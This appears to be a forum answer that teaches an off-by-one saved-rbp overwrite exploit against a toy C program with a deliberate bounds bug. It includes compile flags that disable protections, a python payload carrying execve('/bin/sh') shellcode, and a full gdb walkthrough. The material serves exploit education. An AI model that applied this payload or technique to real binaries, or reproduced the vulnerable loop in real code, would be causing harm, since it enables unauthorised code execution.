So let's start with a description of the trick that can be used to set the desired return address value without passing zero bytes in payload.
I've changed your code a little bit to make it easier to do the trick. Here is new code:
#include <string.h>
int i;
void cpy(char *x) {
char buf[128];
for (i = 0; i <= 128; ++i) {
buf[i] = x[i];
}
}
int main(int argc, char **argv) {
cpy(argv[1]);
return 0;
}
The main difference is that now we can control the value of the less significant byte of saved rbp. In your example we only can set it to zero.
So here the stack frame of our cpy function:

@rbp - saved base stack pointer of main function
@rsp - stack pointer at the start of cpy function (right after push rbp)
The trick is that we overwrite the last byte in such way that @rbp = @rsp - 8. So when we return from main function $rbp will be equal to @rsp - 8 and thus return address will be 8 bytes before @rsp - 8 i.e. also @rsp - 8!
After return from main we will jump to @rsp - 8. So now we simply put jmp to shellcode at this address and we are done:

But in your original example this trick can't be done because we can't control value of less significant byte of @rbp.
It should also be noted that this trick will not work if @rbp and @rsp differ more than in one last byte.
And finally here is exploit.
Compile code with executable stack and without stack protection:
$ gcc test.c -o test -z execstack -fno-stack-protector
Get byte code for our jmp to shellcode:
$ rasm2 -a x86 -b 64 'jmp -0x50'
ebae
Exploit under gdb:
$ gdb --args test $(python -c 'print "\x90" * 91 + "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + "\xeb\xb8" + "a" * 6 + "\xc8"')
>>> b cpy
>>> b *cpy+90
>>> r
Breakpoint 1, 0x00000000004004aa in cpy ()
So here is saved rbp:
>>> x/1gx $rbp
0x7fffffffd3d0: 0x00007fffffffd3f0
Here is rsp at the start of cpy function:
>>> p/x $rsp
$1 = 0x7fffffffd3d0
The value of rbp which we want to get after return from cpy (that's why last byte of payload is \xc8)
>>> p/x $rsp - 8
$2 = 0x7fffffffd3c8
Continue to the end of cpy:
>>> c
Breakpoint 2, 0x0000000000400500 in cpy ()
Asm code of cpy:
>>> disassemble cpy
Dump of assembler code for function cpy:
0x00000000004004a6 <+0>: push rbp
0x00000000004004a7 <+1>: mov rbp,rsp
0x00000000004004aa <+4>: sub rsp,0x10
0x00000000004004ae <+8>: mov QWORD PTR [rbp-0x88],rdi
0x00000000004004b5 <+15>: mov DWORD PTR [rip+0x20046d],0x0 # 0x60092c <i>
0x00000000004004bf <+25>: jmp 0x4004f2 <cpy+76>
0x00000000004004c1 <+27>: mov eax,DWORD PTR [rip+0x200465] # 0x60092c <i>
0x00000000004004c7 <+33>: mov edx,DWORD PTR [rip+0x20045f] # 0x60092c <i>
0x00000000004004cd <+39>: movsxd rcx,edx
0x00000000004004d0 <+42>: mov rdx,QWORD PTR [rbp-0x88]
0x00000000004004d7 <+49>: add rdx,rcx
0x00000000004004da <+52>: movzx edx,BYTE PTR [rdx]
0x00000000004004dd <+55>: cdqe
0x00000000004004df <+57>: mov BYTE PTR [rbp+rax*1-0x80],dl
0x00000000004004e3 <+61>: mov eax,DWORD PTR [rip+0x200443] # 0x60092c <i>
0x00000000004004e9 <+67>: add eax,0x1
0x00000000004004ec <+70>: mov DWORD PTR [rip+0x20043a],eax # 0x60092c <i>
0x00000000004004f2 <+76>: mov eax,DWORD PTR [rip+0x200434] # 0x60092c <i>
0x00000000004004f8 <+82>: cmp eax,0x80
0x00000000004004fd <+87>: jle 0x4004c1 <cpy+27>
0x00000000004004ff <+89>: nop
=> 0x0000000000400500 <+90>: leave
0x0000000000400501 <+91>: ret
End of assembler dump.
Value of rbp after leave:
>>> ni
>>> p/x $rbp
$1 = 0x7fffffffd3c8
Execute till the end of main:
>>> ni
>>> ni
>>> ni
>>> disassemble
Dump of assembler code for function main:
0x0000000000400502 <+0>: push rbp
0x0000000000400503 <+1>: mov rbp,rsp
0x0000000000400506 <+4>: sub rsp,0x10
0x000000000040050a <+8>: mov DWORD PTR [rbp-0x4],edi
0x000000000040050d <+11>: mov QWORD PTR [rbp-0x10],rsi
0x0000000000400511 <+15>: mov rax,QWORD PTR [rbp-0x10]
0x0000000000400515 <+19>: add rax,0x8
0x0000000000400519 <+23>: mov rax,QWORD PTR [rax]
0x000000000040051c <+26>: mov rdi,rax
0x000000000040051f <+29>: call 0x4004a6 <cpy>
0x0000000000400524 <+34>: mov eax,0x0
0x0000000000400529 <+39>: leave
=> 0x000000000040052a <+40>: ret
End of assembler dump.
>>> ni
Now we at @rsp - 8 and here is our jmp to shellcode:
>>> disassemble $rip,+2
Dump of assembler code from 0x7fffffffd3c8 to 0x7fffffffd3ca:
=> 0x00007fffffffd3c8: jmp 0x7fffffffd382
End of assembler dump.
And finally shellcode:
>>> ni
>>> disassemble $rip,+0x50
Dump of assembler code from 0x7fffffffd382 to 0x7fffffffd3d2:
=> 0x00007fffffffd382: nop
0x00007fffffffd383: nop
0x00007fffffffd384: nop
0x00007fffffffd385: nop
...
0x00007fffffffd3ab: xor rdi,rdi
0x00007fffffffd3ae: push rdi
0x00007fffffffd3af: push rdi
0x00007fffffffd3b0: pop rsi
0x00007fffffffd3b1: pop rdx
0x00007fffffffd3b2: movabs rdi,0x68732f6e69622f2f
0x00007fffffffd3bc: shr rdi,0x8
0x00007fffffffd3c0: push rdi
0x00007fffffffd3c1: push rsp
0x00007fffffffd3c2: pop rdi
0x00007fffffffd3c3: push 0x3b
0x00007fffffffd3c5: pop rax
0x00007fffffffd3c6: syscall






